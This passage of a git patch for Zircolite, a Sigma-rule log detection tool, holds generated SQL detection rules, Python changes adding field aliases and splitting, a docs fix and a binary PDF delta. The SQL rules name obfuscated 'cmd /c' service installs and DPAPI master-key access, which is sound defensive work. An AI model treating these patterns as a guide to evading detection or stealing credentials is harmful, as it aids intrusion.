'\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/zircolite.py b/zircolite.py index 1af1880..5d196c9 100755 --- a/zircolite.py +++ b/zircolite.py @@ -545,6 +545,8 @@ def __init__( self.fieldExclusions = self.fieldMappingsDict["exclusions"] self.fieldMappings = self.fieldMappingsDict["mappings"] self.uselessValues = self.fieldMappingsDict["useless"] + self.aliases = self.fieldMappingsDict["alias"] + self.fieldSplitList = self.fieldMappingsDict["split"] def run(self, file): """ @@ -575,26 +577,65 @@ def flatten(x, name=""): # Excluding useless values (e.g. "null"). The value must be an exact match. if not value in self.uselessValues: # Applying field mappings - if name[:-1] in self.fieldMappings: - key = self.fieldMappings[name[:-1]] + rawFieldName = name[:-1] + if rawFieldName in self.fieldMappings: + key = self.fieldMappings[rawFieldName] else: # Removing all annoying character from field name key = "".join( - e for e in name[:-1].split(".")[-1] if e.isalnum() + e for e in rawFieldName.split(".")[-1] if e.isalnum() ) - JSONLine[key] = value - # Creating the CREATE TABLE SQL statement - if key.lower() not in self.keyDict: - self.keyDict[key.lower()] = key - if type(value) is int: - fieldStmt += f"'{key}' INTEGER,\n" - else: - fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n" + + # Preparing aliases + keys = [key] + if key in self.aliases: + keys.append(self.aliases[key]) + if rawFieldName in self.aliases: + keys.append(self.aliases[rawFieldName]) + + # Applying field splitting + fieldsToSplit = [] + if rawFieldName in self.fieldSplitList: + fieldsToSplit.append(rawFieldName) + if key in self.fieldSplitList: + fieldsToSplit.append(key) + + if len(fieldsToSplit) > 0: + for field in fieldsToSplit: + try: + splittedFields = value.split( + self.fieldSplitList[field]["separator"] + ) + for splittedField in splittedFields: + k, v = splittedField.split( + self.fieldSplitList[field]["equal"] + ) + keyLower = k.lower() + JSONLine[k] = v + if keyLower not in self.keyDict: + self.keyDict[keyLower] = k + fieldStmt += f"'{k}' TEXT COLLATE NOCASE,\n" + except Exception as e: + self.logger.error( + f"ERROR : Couldn't apply field splitting {e}" + ) + + # Applying aliases + for key in keys: + JSONLine[key] = value + # Creating the CREATE TABLE SQL statement + keyLower = key.lower() + if keyLower not in self.keyDict: + self.keyDict[keyLower] = key + if type(value) is int: + fieldStmt += f"'{key}' INTEGER,\n" + else: + fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n" # If filesize is not zero if os.stat(file).st_size != 0: with open(str(file), "r", encoding="utf-8") as JSONFile: - filename = str(file).split(os.path.sep)[1] + filename = os.path.basename(file) for line in JSONFile: try: dictToFlatten = json.loads(line) diff --git a/zircolite_dev.py b/zircolite_dev.py index 4066f1a..37acfa8 100755 --- a/zircolite_dev.py +++ b/zircolite_dev.py @@ -357,6 +357,8 @@ def __init__(self, configFile, logger=None, timeAfter="1970-01-01T00:00:00", tim self.fieldExclusions = self.fieldMappingsDict["exclusions"] self.fieldMappings = self.fieldMappingsDict["mappings"] self.uselessValues = self.fieldMappingsDict["useless"] + self.aliases = self.fieldMappingsDict["alias"] + self.fieldSplitList = self.fieldMappingsDict["split"] def run(self, file): """ @@ -385,23 +387,53 @@ def flatten(x, name=''): # Excluding useless values (e.g. "null"). The value must be an exact match. if not value in self.uselessValues: # Applying field mappings - if name[:-1] in self.fieldMappings: - key = self.fieldMappings[name[:-1]] + rawFieldName = name[:-1] + if rawFieldName in self.fieldMappings: + key = self.fieldMappings[rawFieldName] else: # Removing all annoying character from field name - key = ''.join(e for e in name[:-1].split(".")[-1] if e.isalnum()) - JSONLine[key] = value - # Creating the CREATE TABLE SQL statement - if key.lower() not in self.keyDict: - self.keyDict[key.lower()] = key - if type(value) is int: - fieldStmt += f"'{key}' INTEGER,\n" - else: - fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n" + key = ''.join(e for e in rawFieldName.split(".")[-1] if e.isalnum()) + + # Preparing aliases + keys = [key] + if key in self.aliases: keys.append(self.aliases[key]) + if rawFieldName in self.aliases: keys.append(self.aliases[rawFieldName]) + + # Applying field splitting + fieldsToSplit = [] + if rawFieldName in self.fieldSplitList: fieldsToSplit.append(rawFieldName) + if key in self.fieldSplitList: fieldsToSplit.append(key) + + if len(fieldsToSplit) > 0: + for field in fieldsToSplit: + try: + splittedFields = value.split(self.fieldSplitList[field]["separator"]) + for splittedField in splittedFields: + k,v = splittedField.split(self.fieldSplitList[field]["equal"]) + keyLower = k.lower() + JSONLine[k] = v + if keyLower not in self.keyDict: + self.keyDict[keyLower] = k + fieldStmt += f"'{k}' TEXT COLLATE NOCASE,\n" + except Exception as e: + self.logger.error(f"ERROR : Couldn't apply field splitting {e}") + + # Applying aliases + for key in keys: + JSONLine[key] = value + # Creating the CREATE TABLE SQL statement + keyLower =key.lower() + if keyLower not in self.keyDict: + self.keyDict[keyLower] = key + if type(value) is int: + fieldStmt += f"'{key}' INTEGER,\n" + else: + fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n" + # If filesize is not zero if os.stat(file).st_size != 0: with open(str(file), 'r', encoding='utf-8') as JSONFile: - filename = str(file).split(os.path.sep)[1] + filename = os.path.basename(file) for line in JSONFile: try: dictToFlatten = json.loads(line) From c53a2fc99279570477103ac7eb9373333aa49c66 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Tue, 2 May 2023 22:40:15 +0200 Subject: [PATCH 2/3] Update docs --- docs/Usage.md | 34 +++++++++++++++++----------------- docs/Zircolite_manual.pdf | Bin 669757 -> 669742 bytes 2 files changed, 17 insertions(+), 17 deletions(-) diff --git a/docs/Usage.md b/docs/Usage.md index fb79d71..e09d146 100644 --- a/docs/Usage.md +++ b/docs/Usage.md @@ -198,14 +198,14 @@ Please keep in mind that as opposed to field alias, the original field name is n Let's say you have this event log in JSON format (the event has been deliberately truncated): ```json - { - "EventID": 1, - "Provider_Name": "Microsoft-Windows-Sysmon", - "Channel": "Microsoft-Windows-Sysmon/Operational", - "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", - "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "IntegrityLevel": "Medium", - } +{ + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", +} ``` Let's say you are not sure all your rules use the "CommandLine" field but you remember that some of them use the "cmdline" field. To avoid any problems you could use an alias for the "CommandLine" field like this : @@ -225,15 +225,15 @@ Let's say you are not sure all your rules use the "CommandLine" field but you re With this configuration, the event log used to apply Sigma rules will look like this : ```json - { - "EventID": 1, - "Provider_Name": "Microsoft-Windows-Sysmon", - "Channel": "Microsoft-Windows-Sysmon/Operational", - "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", - "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", - "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "IntegrityLevel": "Medium", - } +{ + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", +} ``` Be careful when using aliases because the data is stored multiple times. diff --git a/docs/Zircolite_manual.pdf b/docs/Zircolite_manual.pdf index e4ae9aba955147384a6813345084d4585bdb3456..2dd5492af00fdecae579e424cfff548a904e91c9 100644 GIT binary patch delta 12597 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 